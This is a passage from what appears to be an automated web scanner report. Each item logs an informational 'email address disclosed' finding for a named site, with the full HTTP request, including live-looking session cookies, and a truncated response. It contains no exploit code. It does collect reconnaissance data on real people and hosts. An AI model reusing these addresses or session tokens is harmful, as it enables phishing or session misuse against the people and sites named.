Cookie: M7F1=CT;

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 02 Nov 2010 16:44:13 GMT
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: application/x-javascript
Cache-Control: max-age=558284
Expires: Tue, 01 Feb 2011 01:27:27 GMT
Date: Tue, 25 Jan 2011 14:22:43 GMT
Content-Length: 9809
Connection: close

/*
Functions for MyATC messaging - please be aware that this effects both the Legacy Site and the JSF site (myatc_header_msg.jspf / .xhtml)
TODO:finish refactoring this && replace Prototype setStyle
...[SNIP]...
List.push('Please enter your password to save your new email address.');
}

else if (!isValidEmail(new_email)) {
errorMsgList.push('Please enter a valid email address format. (Example: emailaddress@domain.com)');
}

else if (new_email.toLowerCase() != confirm_email.toLowerCase()) {
errorMsgList.push('The email addresses entered do not match. Please double-check your email address and confir
...[SNIP]...

24.152. http://www.barelyfitz.com/projects/tabber/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barelyfitz.com
Path:   /projects/tabber/

Issue detail

The following email addresses were disclosed in the response:
  • info@barelyfitz.com
  • pat@barelyfitz.com

Request

GET /projects/tabber/ HTTP/1.1
Host: www.barelyfitz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:24:24 GMT
Server: Apache
X-Powered-By: PHP/4.4.1
Connection: close
Content-Type: text/html
Content-Length: 14750

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML LANG="en">
<HEAD>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859
...[SNIP]...
<LINK REL="Made" HREF="mailto:info@barelyfitz.com"
TITLE="BarelyFitz Designs Feedback">
...[SNIP]...
<input type="hidden" name="business" value="pat@barelyfitz.com">
...[SNIP]...

24.153. http://www.barkerstores.com/soundings/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barkerstores.com
Path:   /soundings/

Issue detail

The following email address was disclosed in the response:
  • webmaster@personal-connections.com

Request

GET /soundings/ HTTP/1.1
Host: www.barkerstores.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 14:24:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=etd10v55qnlha3bgxe4zk255; path=/
Set-Cookie: chk_support=check; path=/
Set-Cookie: SOU_CustID=SOU13989; path=/
Set-Cookie: SOU_CartID=SOU-9E35923E-12511; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26388


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
   <HEAD>
       <title>Soundings Online Catalog</title>
       <meta name="GENERATOR" content="Microsoft Visual Studio.NET 7.0">
       <me
...[SNIP]...
<script language="JavaScript" src="pupdate.js">

/*
Popup calendar script by Sev Kotchnev (webmaster@personal-connections.com)
For full source code and installation instructions to this script
Visit http://www.dynamicdrive.com
*/

       </script>
...[SNIP]...

24.154. http://www.blip.tv/about/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blip.tv
Path:   /about/

Issue detail

The following email address was disclosed in the response:
  • aisserlis@rubenstein.com

Request

GET /about/ HTTP/1.1
Host: www.blip.tv
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Cookie
X-otter-skin: blipnew
Set-Cookie: tab_state=about; domain=.blip.tv; path=/; expires=Tue, 08-Feb-2011 13:12:59 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 16917
Date: Tue, 25 Jan 2011 13:12:59 GMT
X-Varnish: 829691482
Age: 0
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>    
   
...[SNIP]...
<a href="mailto:aisserlis@rubenstein.com">aisserlis@rubenstein.com</a>
...[SNIP]...

24.155. https://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:
  • brian@cherne.net

Request

GET /JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661; mbox=PC#1295637745501-300919.17#1297178364|check#true#1295968824|session#1295968763602-421268#1295970624

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Location: http://www.bmwusa.com/JavaScript/jQuery/plugins/jquery.hoverIntent.minified.js
Content-Type: application/x-javascript
ETag: "982f96e670abcb1:0"
Last-Modified: Mon, 03 Jan 2011 18:06:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:22 GMT
Connection: keep-alive
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

24.156. https://www.bmwusa.com/JavaScript/s_code.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /JavaScript/s_code.js

Issue detail

The following email address was disclosed in the response:
  • id@Ls.tc

Request

GET /JavaScript/s_code.js HTTP/1.1
Host: www.bmwusa.com
Connection: keep-alive
Referer: https://www.bmwusa.com/Secured/Content/Forms/Login.aspx?enc=mwSSA92UKNV8IOQQODvBfnVrf6qU9VeS34q4mJ4c7s46MR9nJlvxG5Subq1kZIKK
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; ASP.NET_SessionId=hwiose4551oubw55xmxold55; WK9733P=DeMPlP7IXaauBIWHUIFjXmeYE0QYEGcbzWFVkx5+pXHnkTqulbOVw2mYu/8OzEEB; NSC_CNX_21529_64.29.204.16=4f52b4193661; mbox=PC#1295637745501-300919.17#1297178364|check#true#1295968824|session#1295968763602-421268#1295970624

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Location: http://www.bmwusa.com/JavaScript/s_code.js
Content-Type: application/x-javascript
ETag: "3c36fbe570abcb1:0"
Last-Modified: Mon, 03 Jan 2011 18:06:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Tue, 25 Jan 2011 15:19:32 GMT
Connection: keep-alive
Content-Length: 44197

.../* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
D
...[SNIP]...
av()+q+(qs?qs:s."
+ "rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+ "lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^
...[SNIP]...

24.157. http://www.boattrader.com/research/resources/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boattrader.com
Path:   /research/resources/

Issue detail

The following email address was disclosed in the response:
  • NatBoatTraderSales@dominionenterprises.com

Request

GET /research/resources/ HTTP/1.1
Host: www.boattrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:57:40 GMT
X-Powered-By: PHP/5.2.13
Last-Modified: Mon, 24 Jan 2011 23:57:40 GMT
If-Modified-Since: Mon, 24 Jan 2011 23:57:40 GMT
Connection: close
Content-Type: text/html
Content-Length: 25335


<!-- dstolweb02-php5b -->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Boat Resources: Boat Loans, Insurance, Transport, And More - BoatTrader.com</title>
   <m
...[SNIP]...
<a href="mailto:NatBoatTraderSales@dominionenterprises.com">NatBoatTraderSales@dominionenterprises.com</a>
...[SNIP]...

24.158. http://www.bymnews.com/scripts/prototype.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bymnews.com
Path:   /scripts/prototype.js

Issue detail

The following email address was disclosed in the response:
  • sam@conio.net

Request

GET /scripts/prototype.js HTTP/1.1
Host: www.bymnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 13:15:20 GMT
Server: Apache
Last-Modified: Fri, 11 Apr 2008 06:06:41 GMT
ETag: "628995d-b9f3-44a92bcdb1e40"
Accept-Ranges: bytes
Content-Length: 47603
Connection: close
Content-Type: application/javascript

/* Prototype JavaScript framework, version 1.4.0
* (c) 2005 Sam Stephenson <sam@conio.net>
*
* THIS FILE IS AUTOMATICALLY GENERATED. When sending patches, please diff
* against the source tree
...[SNIP]...

24.159. http://www.cloudaccess.net/cloudaccess-partner-program.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /cloudaccess-partner-program.html

Issue detail

The following email address was disclosed in the response:
  • garybrooks@cloudaccess.net

Request

GET /cloudaccess-partner-program.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:37 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:36 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:37 GMT; path=/
Last-Modified: Tue, 21 Dec 2010 04:33:21 GMT
Expires: Mon, 24 Jan 2011 14:07:37 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34129

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...
<li>Scan and email the agreement to garybrooks@cloudaccess.net, or fax to 313-899-7032.</li>
...[SNIP]...

24.160. http://www.cloudaccess.net/contact-us.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /contact-us.html

Issue detail

The following email address was disclosed in the response:
  • sales@cloudaccess.net

Request

GET /contact-us.html HTTP/1.1
Host: www.cloudaccess.net
Proxy-Connection: keep-alive
Referer: http://www.cloudaccess.net/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:43 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:42 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=d532b140cef5c1b2783902e3; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:43 GMT; path=/
Last-Modified: Tue, 02 Nov 2010 20:37:37 GMT
Expires: Mon, 24 Jan 2011 14:07:43 GMT
X-Content-Encoded-By: Joomla! 1.5
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24612

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...
<br />sales@cloudaccess.net<br />
...[SNIP]...

24.161. http://www.cloudaccess.net/contact-us/474.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /contact-us/474.html

Issue detail

The following email address was disclosed in the response:
  • sales@cloudaccess.net

Request

GET /contact-us/474.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:56 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:56 GMT; path=/
Last-Modified: Sat, 17 Jul 2010 19:57:40 GMT
Expires: Mon, 24 Jan 2011 14:07:56 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...
<br />sales@cloudaccess.net<br />
...[SNIP]...

24.162. http://www.cloudaccess.net/investor-relations.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /investor-relations.html

Issue detail

The following email address was disclosed in the response:
  • ceo@cloudaccess.net

Request

GET /investor-relations.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:55 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:54 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:55 GMT; path=/
Last-Modified: Fri, 27 Aug 2010 04:46:33 GMT
Expires: Mon, 24 Jan 2011 14:07:55 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...
<a href="mailto:ceo@cloudaccess.net" target="_blank">ceo@cloudaccess.net</a>
...[SNIP]...

24.163. http://www.cloudaccess.net/plugins/system/rokbox/rokbox.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /plugins/system/rokbox/rokbox.js

Issue detail

The following email address was disclosed in the response:
  • djamil@rockettheme.com

Request

GET /plugins/system/rokbox/rokbox.js HTTP/1.1
Host: www.cloudaccess.net
Proxy-Connection: keep-alive
Referer: http://www.cloudaccess.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:04 GMT
Server: Apache/2.2.17 (CentOS)
Last-Modified: Tue, 02 Mar 2010 15:43:55 GMT
ETag: "b064f-4f34-480d33bb4c4c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 20276

/**
* RokBox - Pops up all sort of media types, html, images, videos, audio, iframes.
*
* @version        1.3
*
* @author        Djamil Legato <djamil@rockettheme.com>
* @copyright    Andy Miller @ Rocketthe
...[SNIP]...

24.164. http://www.cloudaccess.net/trial.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cloudaccess.net
Path:   /trial.html

Issue detail

The following email address was disclosed in the response:
  • demosupport@cloudaccess.net

Request

GET /trial.html HTTP/1.1
Host: www.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; 5a3e568434cf5e68c5f222754be27ef3=tbtnb9eq9lvbh56i28r6tshfq3; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.1.10.1295877160; gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:52:46 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-presets=deleted; expires=Sun, 24-Jan-2010 13:52:46 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-backgroundlevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-bodylevel=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-cssstyle=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-linkcolor=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-family=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Set-Cookie: gantry-204ee8af065a346f6e449a73e1f7b0d7-font-size-is=deleted; expires=Tue, 24-Jan-2012 13:52:47 GMT; path=/
Last-Modified: Tue, 03 Aug 2010 04:44:41 GMT
Expires: Mon, 24 Jan 2011 14:07:47 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<head>
    <b
...[SNIP]...
<a href="mailto:demosupport@cloudaccess.net">demosupport@cloudaccess.net</a>
...[SNIP]...

24.165. http://www.commercialtrucktrader.com/sell/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.commercialtrucktrader.com
Path:   /sell/

Issue detail

The following email addresses were disclosed in the response:
  • customerservice@commercialtrucktrader.com
  • webmaster@commercialtrucktrader.com

Request

GET /sell/ HTTP/1.1
Host: www.commercialtrucktrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 23:57:57 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 99484

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<!-- dstolweb04-php5b -->
<html>
<head>
   <title>Sell Your New or Used Commercial Truck and Trailer - CommercialTruckTrader.com</title>

...[SNIP]...
<a href="mailto:customerservice@commercialtrucktrader.com">customerservice@commercialtrucktrader.com</a> or <a href="mailto:webmaster@commercialtrucktrader.com">webmaster@commercialtrucktrader.com</a>
...[SNIP]...

24.166. http://www.cycletrader.com/research/resources/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cycletrader.com
Path:   /research/resources/

Issue detail

The following email address was disclosed in the response:
